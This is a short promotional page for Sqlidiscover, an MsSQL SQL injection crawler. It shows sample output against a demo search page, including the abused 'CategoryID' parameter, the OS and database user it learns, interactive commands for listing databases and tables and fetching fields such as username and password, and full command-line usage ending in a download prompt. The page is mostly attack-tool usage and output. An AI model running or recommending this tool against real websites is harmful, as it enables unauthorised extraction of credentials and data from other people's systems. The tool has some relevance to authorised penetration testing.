Sqlidiscover - MsSQL SQL Injection Data Crawler
sqli_discover_tables v0.21 29Jan2009 kaneda 'n phildo, upgraded by redsand.
[*] HTTP cookie set to ASPSESSIONIDSSSTRCDB=JNLLJILCKOOLFEFNLDOBANFL
[*] URL to process: http://www.example.com/catalog/Search.asp
[*] Abusing 'CategoryID'...
[+] OS version: Windows NT 5.2 (Build 3790: Service Pack 2)
[+] Current user: dbo
unknown_db.table> help
sqliinjection interactive session help
exit / quit - leave sqli
discover databases / discover dbs - discover all databases on system
discover tables - discover all tables on system
discover columns - discover all columns in current table
select db/database [name] - change context to database [name]
select table [name] - change context to table [name]
fetch n,..,x - fetch data from columns n, etc. (i.e. fetch username,password).
... and more...
usage: sqlidiscover [-G|-P] [-v] [-b] [-phostname:port] [-cCookieName:CookieValue] [-avarname1=value1,...,varname2=value2] [-ivarname] URL
-G - use GET method
-P - use POST method
-a - additional variables i.e. -aaction=create,cid=12
-b - bypass SQL, OS version and current user check
-i - variable to screw with i.e. -itxtPassword
-v - verbose
URL - http://vuln/file.asp
-p - use http/https proxy, format hostname:port i.e. -pmyproxy.com:8080
-c - use browser cookie, format name:value i.e. -cASPSESSIONID:LCACPKILKFN
... and more...
Download Now!
Sqlidiscover MsSQL SQL Injection Crawler